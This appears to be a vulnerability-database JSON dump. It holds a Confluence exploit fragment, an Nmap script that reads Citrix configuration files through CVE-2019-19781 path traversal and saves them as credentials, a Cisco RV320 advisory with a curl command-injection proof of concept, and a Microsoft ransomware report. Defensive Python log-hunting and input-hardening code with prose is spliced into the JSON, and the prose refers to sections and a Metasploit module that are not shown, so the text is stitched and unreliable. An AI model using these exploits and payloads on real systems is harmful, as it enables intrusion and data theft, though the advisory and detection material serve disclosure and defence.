help=\"use the exploit to browse local file system on the target endpoint\"\r\n )\r\n parser_file_system.add_argument(\r\n \"path\",\r\n help=\"target path that should be retrieved from the vulnerable server, can be path to a file or to a directory\"\r\n )\r\n parser_file_system.set_defaults(func=exploit_path_traversal)\r\n\r\n # using file upload to deploy payload and achieve RCE\r\n parser_rce = subparsers.add_parser(\r\n \"rce\",\r\n help=\"use the exploit to upload a template \"\r\n )\r\n parser_rce.add_argument(\r\n \"-hd\", \"--home-directory\",\r\n help=\"Confluence home directory on the server\"\r\n )\r\n parser_rce.add_argument(\r\n \"-c\", \"--cookie\",\r\n help=\"cookie that should be used for the session, value passed as it is in HTTP request, for example: \"\r\n \"-c JSESSIONID=ABCDEF123456789ABCDEF123456789AB\",\r\n type=check_cookie_format,\r\n required=True\r\n )\r\n parser_rce.add_argument(\r\n \"command\",\r\n help=\"target path that should be retrieved from the vulnerable server, can be path to a file or to a directory\"\r\n )\r\n parser_rce.set_defaults(func=exploit_rce)\r\n\r\n # parsing\r\n arguments = parser.parse_args()\r\n\r\n return arguments\r\n\r\n\r\nclass Configuration:\r\n \"\"\"\r\n Represents all supported configuration items.\r\n \"\"\"\r\n\r\n # Parse arguments and set all configuration variables\r\n def __init__(self, script_args):\r\n self.script_arguments = script_args\r\n\r\n # setting input arguments\r\n self._proxy = self.script_arguments.proxy\r\n self._target_protocol = \"https\" if self.script_arguments.tls else \"http\"\r\n self._target_host = self.script_arguments.target_host\r\n self._target_port = self.script_arguments.port if self.script_arguments.port else \\\r\n 443 if self.script_arguments.tls else 80\r\n\r\n @staticmethod\r\n def get_logger(verbosity):\r\n \"\"\"\r\n Prepares logger to output to stdout with appropriate verbosity.\r\n \"\"\"\r\n logger = logging.getLogger()\r\n # default logging level\r\n 
"PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-19781", "CVE-2019-19781"], "modified": "2020-01-16T00:00:00", "id": "EDB-ID:47930", "href": "https://www.exploit-db.com/exploits/47930", "sourceData": "# Exploit Title: Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal\r\n# Date: 2019-12-17\r\n# CVE: CVE-2019-19781\r\n# Vulenrability: Path Traversal\r\n# Vulnerablity Discovery: Mikhail Klyuchnikov\r\n# Exploit Author: Dhiraj Mishra\r\n# Vulnerable Version: 10.5, 11.1, 12.0, 12.1, and 13.0\r\n# Vendor Homepage: https://www.citrix.com/\r\n# References: https://support.citrix.com/article/CTX267027\r\n# https://github.com/nmap/nmap/pull/1893\r\n\r\nlocal http = require \"http\"\r\nlocal stdnse = require \"stdnse\"\r\nlocal shortport = require \"shortport\"\r\nlocal table = require \"table\"\r\nlocal string = require \"string\"\r\nlocal vulns = require \"vulns\"\r\nlocal nmap = require \"nmap\"\r\nlocal io = require \"io\"\r\n\r\ndescription = [[\r\nThis NSE script checks whether the traget server is vulnerable to\r\nCVE-2019-19781\r\n]]\r\n---\r\n-- @usage\r\n-- nmap --script https-citrix-path-traversal -p <port> <host>\r\n-- nmap --script https-citrix-path-traversal -p <port> <host> --script-args\r\noutput='file.txt'\r\n-- @output\r\n-- PORT STATE SERVICE\r\n-- 443/tcp open http\r\n-- | CVE-2019-19781:\r\n-- | Host is vulnerable to CVE-2019-19781\r\n-- @changelog\r\n-- 16-01-2020 - Author: Dhiraj Mishra (@RandomDhiraj)\r\n-- 17-12-2019 - Discovery: Mikhail Klyuchnikov (@__Mn1__)\r\n-- @xmloutput\r\n-- <table key=\"NMAP-1\">\r\n-- <elem key=\"title\">Citrix ADC Path Traversal aka (Shitrix)</elem>\r\n-- <elem key=\"state\">VULNERABLE</elem>\r\n-- <table key=\"description\">\r\n-- <elem>Citrix Application Delivery Controller 
(ADC) and Gateway 10.5,\r\n11.1, 12.0, 12.1, and 13.0 are vulnerable to a unauthenticated path\r\n-- traversal vulnerability that allows attackers to read configurations or\r\nany other file.\r\n-- </table>\r\n-- <table key=\"dates\">\r\n-- <table key=\"disclosure\">\r\n-- <elem key=\"year\">2019</elem>\r\n-- <elem key=\"day\">17</elem>\r\n-- <elem key=\"month\">12</elem>\r\n-- </table>\r\n-- </table>\r\n-- <elem key=\"disclosure\">17-12-2019</elem>\r\n-- <table key=\"extra_info\">\r\n-- </table>\r\n-- <table key=\"refs\">\r\n-- <elem>https://support.citrix.com/article/CTX267027</elem>\r\n-- <elem>https://nvd.nist.gov/vuln/detail/CVE-2019-19781</elem>\r\n-- </table>\r\n-- </table>\r\n\r\nauthor = \"Dhiraj Mishra (@RandomDhiraj)\"\r\nDiscovery = \"Mikhail Klyuchnikov (@__Mn1__)\"\r\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\r\ncategories = {\"discovery\", \"intrusive\",\"vuln\"}\r\n\r\nportrule = shortport.ssl\r\n\r\naction = function(host,port)\r\n local outputFile = stdnse.get_script_args(SCRIPT_NAME..\".output\") or nil\r\n local vuln = {\r\n title = 'Citrix ADC Path Traversal',\r\n state = vulns.STATE.NOT_VULN,\r\n description = [[\r\nCitrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0,\r\n12.1, and 13.0 are vulnerable\r\nto a unauthenticated path traversal vulnerability that allows attackers to\r\nread configurations or any other file.\r\n ]],\r\n references = {\r\n 'https://support.citrix.com/article/CTX267027',\r\n 'https://nvd.nist.gov/vuln/detail/CVE-2019-19781',\r\n },\r\n dates = {\r\n disclosure = {year = '2019', month = '12', day = '17'},\r\n },\r\n }\r\n local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)\r\n local path = \"/vpn/../vpns/cfg/smb.conf\"\r\n local response\r\n local output = {}\r\n local success = \"Host is vulnerable to CVE-2019-19781\"\r\n local fail = \"Host is not vulnerable\"\r\n local match = \"[global]\"\r\n local credentials\r\n local citrixADC\r\n response = 
http.get(host, port.number, path)\r\n\r\n if not response.status then\r\n stdnse.print_debug(\"Request Failed\")\r\n return\r\n end\r\n if response.status == 200 then\r\n if string.match(response.body, match) then\r\n stdnse.print_debug(\"%s: %s GET %s - 200 OK\",\r\nSCRIPT_NAME,host.targetname or host.ip, path)\r\n vuln.state = vulns.STATE.VULN\r\n citrixADC = ((\"Path traversal: https://%s:%d%s\"):format(host.targetname\r\nor host.ip,port.number, path))\r\n if outputFile then\r\n credentials = response.body:gsub('%W','.')\r\nvuln.check_results = stdnse.format_output(true, citrixADC)\r\n vuln.extra_info = stdnse.format_output(true, \"Credentials are being\r\nstored in the output file\")\r\nfile = io.open(outputFile, \"a\")\r\nfile:write(credentials, \"\\n\")\r\n else\r\n vuln.check_results = stdnse.format_output(true, citrixADC)\r\n end\r\n end\r\n elseif response.status == 403 then\r\n stdnse.print_debug(\"%s: %s GET %s - %d\", SCRIPT_NAME, host.targetname\r\nor host.ip, path, response.status)\r\n vuln.state = vulns.STATE.NOT_VULN\r\n end\r\n\r\n return vuln_report:make_output(vuln)\r\nend", "sourceHref": "https://www.exploit-db.com/download/47930", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-16T02:13:53", "description": "", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-01-25T00:00:00", "type": "exploitdb", "title": "Cisco RV320 Dual Gigabit WAN VPN Router 1.4.2.15 - Command Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
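Both CVE-2019-19781 entries above pivot on the same traversal, `/vpn/../vpns/`: the NSE script and the Metasploit `check` read `/vpns/cfg/smb.conf` and treat a 403 as the mitigation being in place, while the Metasploit exploit POSTs to `newbm.pl` with a traversing `NSC_USER` to drop a Template Toolkit file and then GETs it as `/vpns/portal/<name>.xml` so the portal renders it. The Python below is an added example, not code from either exploit-db entry or from Citrix: it turns that probe-write-render sequence into a hunt over an Apache-style access log. The sample log lines, client addresses and the template name are constructed for the example; the request shapes follow the module above.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in Apache common log format; addresses, timestamps and the
# 16-character template name are made up for this example.
SAMPLE_LOG = """\
192.0.2.10 - - [20/Jan/2020:10:01:03 +0000] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 200 1048
192.0.2.10 - - [20/Jan/2020:10:01:05 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 142
192.0.2.10 - - [20/Jan/2020:10:01:08 +0000] "GET /vpn/../vpns/portal/qwertyuiopasdfgh.xml HTTP/1.1" 200 37
198.51.100.7 - - [20/Jan/2020:10:02:00 +0000] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 403 210
203.0.113.9 - - [20/Jan/2020:10:03:00 +0000] "GET /vpn/index.html HTTP/1.1" 200 5120
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# The traversal out of /vpn/ into the Perl portal tree that CVE-2019-19781 is about.
TRAVERSAL_RE = re.compile(r"/vpn/(?:\.\./)+vpns/")
# Second stage of the Metasploit module: GET of the dropped template as <name>.xml.
TEMPLATE_XML_RE = re.compile(r"/vpns/portal/[\w-]+\.xml$")


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def classify(rec):
    """Tag one request with the CVE-2019-19781 stages it resembles ([] if none)."""
    tags = []
    uri, method, status = rec["uri"], rec["method"], rec["status"]
    if not TRAVERSAL_RE.search(uri):
        return tags                      # no traversal: out of scope for this hunt
    # 403 is what the Citrix responder-policy mitigation returns; the NSE script
    # above maps it to NOT_VULN, so keep it distinct from a served traversal.
    tags.append("traversal-blocked" if status == 403 else "traversal")
    if uri.endswith("/vpns/cfg/smb.conf"):
        tags.append("probe-smb.conf")    # the read-only check both scripts use
    if method == "POST" and uri.endswith("/vpns/portal/scripts/newbm.pl"):
        tags.append("stage1-template-write")
    if method == "GET" and TEMPLATE_XML_RE.search(uri):
        tags.append("stage2-template-render")
    return tags


def hunt(log_text, window=timedelta(minutes=10)):
    """Return {client_ip: sorted tags}. Adds 'likely-rce' when a successful
    newbm.pl write is followed, within `window`, by a successful .xml fetch
    from the same client: the device rendered an attacker-supplied template."""
    verdicts = defaultdict(set)
    writes = defaultdict(list)           # ip -> timestamps of successful stage 1
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec)
        if not tags:
            continue
        ip = rec["ip"]
        verdicts[ip].update(tags)
        if "stage1-template-write" in tags and rec["status"] == 200:
            writes[ip].append(rec["ts"])
        if "stage2-template-render" in tags and rec["status"] == 200:
            if any(timedelta(0) <= rec["ts"] - t <= window for t in writes[ip]):
                verdicts[ip].add("likely-rce")
    return {ip: sorted(tags) for ip, tags in verdicts.items()}


if __name__ == "__main__":
    for ip, tags in hunt(SAMPLE_LOG).items():
        print(ip, ", ".join(tags))
```

A `likely-rce` hit means the appliance rendered an attacker-written template and should be handled as compromised; in that case list `/netscaler/portal/templates/` and `/var/tmp/netscaler/portal/templates/` (the cleanup locations named at the top of this section) for recently written `.xml` files. `traversal-blocked` is only as good as the responder policy producing the 403: a 200 on the `smb.conf` probe after the mitigation was supposedly applied means it is not in effect.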
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-1652", "CVE-2019-1652"], "modified": "2019-01-25T00:00:00", "id": "EDB-ID:46243", "href": "https://www.exploit-db.com/exploits/46243", "sourceData": "RedTeam Pentesting discovered a command injection vulnerability in the\r\nweb-based certificate generator feature of the Cisco RV320 router.\r\n\r\n\r\nDetails\r\n=======\r\n\r\nProduct: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others\r\nAffected Versions: 1.4.2.15 and later\r\nFixed Versions: since 1.4.2.20\r\nVulnerability Type: Remote Code Execution\r\nSecurity Risk: medium\r\nVendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject\r\nVendor Status: fixed version released\r\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2018-004\r\nAdvisory Status: published\r\nCVE: CVE-2019-1652\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1652\r\n\r\n\r\nIntroduction\r\n============\r\n\r\n\"Keep your employees, your business, and yourself productive and\r\neffective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal\r\nchoice for any small office or small business looking for performance,\r\nsecurity, and reliability in its network.\"\r\n(from the Cisco RV320 product page [1])\r\n\r\n\r\nMore Details\r\n============\r\n\r\nThe router's web interface enables users to generate new X.509\r\ncertificates directly on the device. A user may enter typical\r\nconfiguration parameters required for the certificate, such as\r\norganisation, the common name and so on. 
In order to generate the\r\ncertificate, the device uses the command-line program openssl [2]. The\r\ndevice's firmware uses the following format string to assemble the\r\nopenssl command:\r\n\r\n------------------------------------------------------------------------\r\nopenssl req -new -nodes -subj '/C=%s/ST=%s/L=%s/O=%s/OU=%s/CN=%s/emailAddress=%s' -keyout %s%s.key -sha256 -out %s%s.csr -days %s -newkey rsa:%s > /dev/null 2>&1\r\n------------------------------------------------------------------------\r\n\r\nAlthough the web interface filters certain special characters via\r\nJavaScript, there is actually no input filtering, escaping or encoding\r\nhappening on the server. This allows attackers to inject arbitrary\r\ncommands.\r\n\r\n\r\nProof of Concept\r\n================\r\n\r\nEven though all components of the subject seem to be vulnerable to\r\ncommand injection, the following example uses the common name to trigger\r\na ping command:\r\n\r\n------------------------------------------------------------------------\r\na'$(ping -c 4 192.168.1.2)'b\r\n------------------------------------------------------------------------\r\n\r\nThe following HTTP POST request invokes the certificate generator\r\nfunction and triggers the command injection. 
It requires a valid session\r\ncookie for the device's web interface.\r\n\r\n------------------------------------------------------------------------\r\ncurl -s -b \"$COOKIE\" \\\r\n--data \"page=self_generator.htm&totalRules=1&OpenVPNRules=30\"\\\r\n\"&submitStatus=1&log_ch=1&type=4&Country=A&state=A&locality=A\"\\\r\n\"&organization=A&organization_unit=A&email=ab%40example.com\"\\\r\n\"&KeySize=512&KeyLength=1024&valid_days=30&SelectSubject_c=1&\"\\\r\n\"SelectSubject_s=1\" \\\r\n--data-urlencode \"common_name=a'\\$(ping -c 4 192.168.1.2)'b\" \\\r\n\"http://192.168.1.1/certificate_handle2.htm?type=4\"\r\n------------------------------------------------------------------------\r\n\r\nAfterwards, the incoming ICMP echo requests can be observed on the\r\nattacker's system at 192.168.1.2.\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nPrevent untrusted users from using the router's web interface.\r\n\r\n\r\nFix\r\n===\r\n\r\nInstall firmware version 1.4.2.20 (or later) on the router.\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nThe vulnerability allows attackers with administrative access to the\r\nrouter's web interface to execute arbitrary operating system commands on\r\nthe device. 
Because attackers require valid credentials to the web\r\ninterface, this vulnerability is only rated as a medium risk.\r\n\r\n\r\nTimeline\r\n========\r\n\r\n2018-09-19 Vulnerability identified\r\n2018-09-27 Customer approved disclosure to vendor\r\n2018-09-28 Vendor notified\r\n2018-10-05 Receipt of advisory acknowledged by vendor\r\n2018-10-05 Notified vendor of disclosure date: 2019-01-09\r\n2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor\r\n2019-01-16 List of affected versions provided by vendor\r\n2019-01-23 Advisory published\r\n\r\n\r\nReferences\r\n==========\r\n\r\n[1] https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html\r\n[2] https://wiki.openssl.org/index.php/Command_Line_Utilities\r\n\r\n\r\nRedTeam Pentesting GmbH\r\n=======================\r\n\r\nRedTeam Pentesting offers individual penetration tests performed by a\r\nteam of specialised IT-security experts. Hereby, security weaknesses in\r\ncompany networks or products are uncovered and can be fixed immediately.\r\n\r\nAs there are only few experts in this field, RedTeam Pentesting wants to\r\nshare its knowledge and enhance the public knowledge with research in\r\nsecurity-related areas. The results are made available as public\r\nsecurity advisories.\r\n\r\nMore information about RedTeam Pentesting can be found at:\r\nhttps://www.redteam-pentesting.de/\r\n\r\nWorking at RedTeam Pentesting\r\n=============================\r\n\r\nRedTeam Pentesting is looking for penetration testers to join our team\r\nin Aachen, Germany. 
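The root cause in the RV320 advisory is the format string itself: user-controlled subject fields are pasted into one shell command line, so a `'` in the common name closes the `-subj` quoting and the `$(...)` that follows is expanded by the shell. The Python below is an added example, not RedTeam Pentesting's or Cisco's code. It builds the vulnerable command string the way the firmware does (simplified to one output path per file instead of the directory-plus-name pairs in the original), shows that a POSIX shell would expand the advisory's ping payload out of it, and then builds the hardened form as an argv list with an allow-list on every RDN value. Nothing is executed: `build_openssl_argv` returns the list you would hand to `subprocess.run` without `shell=True`.

```python
import re

# Subject components in the order the advisory's format string consumes them.
SUBJECT_FIELDS = ("C", "ST", "L", "O", "OU", "CN", "emailAddress")

# Allow-list for a single RDN value: no quotes, no $ ( ) ` ; & | \ and, because the
# value lands inside -subj, no '/' or '=' that could add or alter components.
SAFE_VALUE = re.compile(r"[A-Za-z0-9 .,@_+-]{1,64}")


def subject_string(subject):
    """'/C=.../ST=.../.../emailAddress=...' exactly as the firmware lays it out."""
    return "/" + "/".join(f"{k}={subject[k]}" for k in SUBJECT_FIELDS)


def build_openssl_cmd_vulnerable(subject, key_path, csr_path, days="365", bits="2048"):
    """The vulnerable pattern: values pasted into one command line that the device
    then runs through a shell. A single quote in any field closes the -subj
    quoting and whatever follows is parsed as shell syntax. Returned, never run."""
    return (f"openssl req -new -nodes -subj '{subject_string(subject)}' "
            f"-keyout {key_path} -sha256 -out {csr_path} -days {days} "
            f"-newkey rsa:{bits} > /dev/null 2>&1")


def shell_substitutions(cmd):
    """$(...) sequences a POSIX shell would expand in cmd, i.e. those not inside
    single quotes. A minimal quote tracker, enough for the advisory's PoC."""
    found, in_single, i = [], False, 0
    while i < len(cmd):
        if cmd[i] == "'":
            in_single = not in_single
        elif not in_single and cmd.startswith("$(", i):
            end = cmd.find(")", i)
            end = len(cmd) - 1 if end == -1 else end
            found.append(cmd[i:end + 1])
            i = end
        i += 1
    return found


def subject_is_safe(subject):
    """True only if every field is present and matches the allow-list."""
    return all(SAFE_VALUE.fullmatch(str(subject.get(k, ""))) for k in SUBJECT_FIELDS)


def build_openssl_argv(subject, key_path, csr_path, days=365, bits=2048):
    """Hardened form: validate every field, then build an argv list. Passed to
    subprocess.run(argv) (no shell=True) each value is a single argument, so
    shell metacharacters are inert even if the allow-list were ever loosened."""
    if not subject_is_safe(subject):
        bad = [k for k in SUBJECT_FIELDS
               if not SAFE_VALUE.fullmatch(str(subject.get(k, "")))]
        raise ValueError(f"illegal characters in subject field(s): {', '.join(bad)}")
    return ["openssl", "req", "-new", "-nodes", "-subj", subject_string(subject),
            "-keyout", key_path, "-sha256", "-out", csr_path,
            "-days", str(int(days)), "-newkey", f"rsa:{int(bits)}"]


# The advisory's proof of concept placed in the common name (constructed request data).
POC_SUBJECT = {"C": "A", "ST": "A", "L": "A", "O": "A", "OU": "A",
               "CN": "a'$(ping -c 4 192.168.1.2)'b", "emailAddress": "ab@example.com"}

if __name__ == "__main__":
    cmd = build_openssl_cmd_vulnerable(POC_SUBJECT, "/tmp/rv320.key", "/tmp/rv320.csr")
    print("shell would expand:", shell_substitutions(cmd))
    print("hardened path accepts it:", subject_is_safe(POC_SUBJECT))
```

The client-side JavaScript filter the advisory mentions is not a control: the curl request bypasses it entirely, which is why the allow-list and the argv construction both live on the server side here.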
If you are interested please visit:\r\nhttps://www.redteam-pentesting.de/jobs/", "sourceHref": "https://www.exploit-db.com/download/46243", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2020-04-30T23:04:13", "description": "At a time when remote work is becoming universal and the strain on SecOps, especially in healthcare and critical industries, has never been higher, ransomware actors are unrelenting, continuing their normal operations.\n\nMultiple ransomware groups that have been accumulating access and maintaining persistence on target networks for several months activated dozens of ransomware deployments in the first two weeks of April 2020. So far the attacks have affected aid organizations, medical billing companies, manufacturing, transport, government institutions, and educational software providers, showing that these ransomware groups give little regard to the critical services they impact, global crisis notwithstanding. These attacks, however, are not limited to critical services, so organizations should be vigilant for signs of compromise.\n\nThe ransomware deployments in this two-week period appear to cause a slight uptick in the volume of ransomware attacks. However, Microsoft security intelligence as well as forensic data from relevant incident response engagements by Microsoft Detection and Response Team (DART) showed that many of the compromises that enabled these attacks occurred earlier. Using an attack pattern typical of [human-operated ransomware](<https://aka.ms/human-operated-ransomware>) campaigns, attackers have compromised target networks for several months beginning earlier this year and have been waiting to monetize their attacks by deploying ransomware when they would see the most financial gain.\n\nMany of these attacks started with the exploitation of vulnerable internet-facing network devices; others used brute force to compromise RDP servers. 
The attacks delivered a wide range of payloads, but they all used the same techniques observed in human-operated ransomware campaigns: credential theft and lateral movement, culminating in the deployment of a ransomware payload of the attacker\u2019s choice. Because the ransomware infections are at the tail end of protracted attacks, defenders should focus on hunting for signs of adversaries performing credential theft and lateral movement activities to prevent the deployment of ransomware.\n\nIn this blog, we share our in-depth analysis of these ransomware campaigns. Below, we will cover:\n\n * Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n * A motley crew of ransomware payloads\n * Immediate response actions for active attacks\n * Building security hygiene to defend networks against human-operated ransomware\n * Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWe have included additional technical details including hunting guidance and recommended prioritization for security operations (SecOps).\n\n## Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n\nWhile the recent attacks deployed various ransomware strains, many of the campaigns shared infrastructure with previous ransomware campaigns and used the same techniques commonly observed in human-operated ransomware attacks.\n\nIn stark contrast to attacks that deliver ransomware via email\u2014which tend to unfold much faster, with ransomware deployed within an hour of initial entry\u2014the attacks we saw in April are similar to the Doppelpaymer ransomware campaigns from 2019, where attackers gained access to affected networks months in advance. 
They then remained relatively dormant within environments until they identified an opportune time to deploy ransomware.\n\nTo gain access to target networks, the recent ransomware campaigns exploited internet-facing systems with the following weaknesses:\n\n * Remote Desktop Protocol (RDP) or Virtual Desktop endpoints without multi-factor authentication (MFA)\n * Older platforms that have reached end of support and are no longer getting security updates, such as Windows Server 2003 and Windows Server 2008, exacerbated by the use of weak passwords\n * Misconfigured web servers, including IIS, electronic health record (EHR) software, backup servers, or systems management servers\n * Citrix Application Delivery Controller (ADC) systems affected by [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)\n * Pulse Secure VPN systems affected by [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\nApplying security patches for internet-facing systems is critical in preventing these attacks. It\u2019s also important to note that, although Microsoft security researchers have not observed the recent attacks exploiting the following vulnerabilities, historical signals indicate that these campaigns may eventually exploit them to gain access, so they are worth reviewing: [CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>), [CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>), [CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>).\n\nLike many breaches, attackers employed credential theft, lateral movement capabilities using common tools, including Mimikatz and Cobalt Strike, network reconnaissance, and data exfiltration. In these specific campaigns, the operators gained access to highly privileged administrator credentials and were ready to take potentially more destructive action if disturbed. 
On networks where attackers deployed ransomware, they deliberately maintained their presence on some endpoints, intending to reinitiate malicious activity after ransom is paid or systems are rebuilt. In addition, while only a few of these groups gained notoriety for selling data, almost all of them were observed viewing and exfiltrating data during these attacks, even if they have not advertised or sold yet.\n\nAs with all human-operated ransomware campaigns, these recent attacks spread throughout an environment affecting email identities, endpoints, inboxes, applications, and more. Because it can be challenging even for experts to ensure complete removal of attackers from a fully compromised network, it\u2019s critical that vulnerable internet-facing systems are proactively patched and mitigations put in place to reduce the risk from these kinds of attacks.\n\n## A motley crew of ransomware payloads\n\nWhile individual campaigns and ransomware families exhibited distinct attributes as described in the sections below, these human-operated ransomware campaigns tended to be variations on a common attack pattern. They unfolded in similar ways and employed generally the same attack techniques. Ultimately, the specific ransomware payload at the end of each attack chain was almost solely a stylistic choice made by the attackers.\n\n\n\n### RobbinHood ransomware\n\nRobbinHood ransomware operators gained some attention for [exploiting vulnerable drivers](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) late in their attack chain to turn off security software. However, like many other human-operated ransomware campaigns, they typically start with an RDP brute-force attack against an exposed asset. They eventually obtain privileged credentials, mostly local administrator accounts with shared or common passwords, and service accounts with domain admin privileges. 
RobbinHood operators, like Ryuk and other well-publicized ransomware groups, leave behind new local and Active Directory user accounts, so they can regain access after their malware and tools have been removed.\n\n### Vatet loader\n\nAttackers often shift infrastructure, techniques, and tools to avoid notoriety that might attract law enforcement or security researchers. They often retain them while waiting for security organizations to start considering associated artifacts inactive, so they face less scrutiny. Vatet, a custom loader for the Cobalt Strike framework that has been seen in ransomware campaigns as early as November 2018, is one of the tools that has resurfaced in the recent campaigns.\n\nThe group behind this tool appears to be particularly intent on targeting hospitals, as well as aid organizations, insulin providers, medical device manufacturers, and other critical verticals. They are one of the most prolific ransomware operators during this time and have caused dozens of cases.\n\nUsing Vatet and Cobalt Strike, the group has delivered various ransomware payloads. More recently, they have been deploying in-memory ransomware that utilizes Alternate Data Streams (ADS) and displays simplistic ransom notes copied from older ransomware families. To access target networks, they exploit [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>), brute force RDP endpoints, and send email containing .lnk files that launch malicious PowerShell commands. Once inside a network, they steal credentials, including those stored in the Credential Manager vault, and move laterally until they gain domain admin privileges. The group has been observed exfiltrating data prior to deploying ransomware.\n\n### NetWalker ransomware\n\nNetWalker campaign operators gained notoriety for targeting hospitals and healthcare providers with emails claiming to provide information about COVID-19. 
These emails also delivered NetWalker ransomware directly as a .vbs attachment, a technique that has gained media attention. However, the campaign operators also compromised networks using misconfigured IIS-based applications to launch Mimikatz and steal credentials, which they then used to launch PsExec, and eventually deploying the same NetWalker ransomware.\n\n### PonyFinal ransomware\n\nThis Java-based ransomware had been considered a novelty, but the campaigns deploying PonyFinal weren\u2019t unusual. Campaign operators compromised internet-facing web systems and obtained privileged credentials. To establish persistence, they used PowerShell commands to launch the system tool mshta.exe and set up a reverse shell based on a common PowerShell attack framework. They also used legitimate tools, such as Splashtop, to maintain remote desktop connections.\n\n### Maze ransomware\n\nOne of the first ransomware campaigns to make headlines for selling stolen data, Maze continues to target technology providers and public services. Maze has a history of going after managed service providers (MSPs) to gain access to the data and networks of MSP customers.\n\nMaze has been delivered via email, but campaign operators have also deployed Maze to networks after gaining access using common vectors, such as RDP brute force. Once inside a network, they perform credential theft, move laterally to access resources and exfiltrate data, and then deploy ransomware.\n\nIn a recent campaign, Microsoft security researchers tracked Maze operators establishing access through an internet-facing system by performing RDP brute force against the local administrator account. 
Using the brute-forced password, campaign operators were able to move laterally because built-in administrator accounts on other endpoints used the same passwords.\n\nAfter gaining control over a domain admin account through credential theft, campaign operators used Cobalt Strike, PsExec, and a plethora of other tools to deploy various payloads and access data. They established fileless persistence using scheduled tasks and services that launched PowerShell-based remote shells. They also turned on Windows Remote Management for persistent control using stolen domain admin privileges. To weaken security controls in preparation for ransomware deployment, they manipulated various settings through Group Policy.\n\n### REvil ransomware\n\nPossibly the first ransomware group to take advantage of the network device vulnerabilities in Pulse VPN to steal credentials to access networks, REvil (also called Sodinokibi) gained notoriety for accessing MSPs and accessing the networks and documents of customers \u2013 and selling access to both. They kept up this activity during the COVID-19 crisis, targeting MSPs and other targets like local governments. 
REvil attacks are differentiated in their uptake of new vulnerabilities, but their techniques overlap with many other groups, relying on credential theft tools like Mimikatz once in the network and performing lateral movement and reconnaissance with tools like PsExec.\n\n### Other ransomware families\n\nOther ransomware families used in human-operated campaigns during this period include:\n\n * Paradise, which used to be distributed directly via email but is now used in human-operated ransomware attacks\n * RagnarLocker, which is deployed by a group that heavily uses RDP and Cobalt Strike with stolen credentials\n * MedusaLocker, which is possibly deployed via existing Trickbot infections\n * LockBit, which is distributed by operators that use the publicly available penetration testing tool CrackMapExec to move laterally\n\n## Immediate response actions for active attacks\n\nWe highly recommend that organizations immediately check if they have any alerts related to these ransomware attacks and prioritize investigation and remediation. 
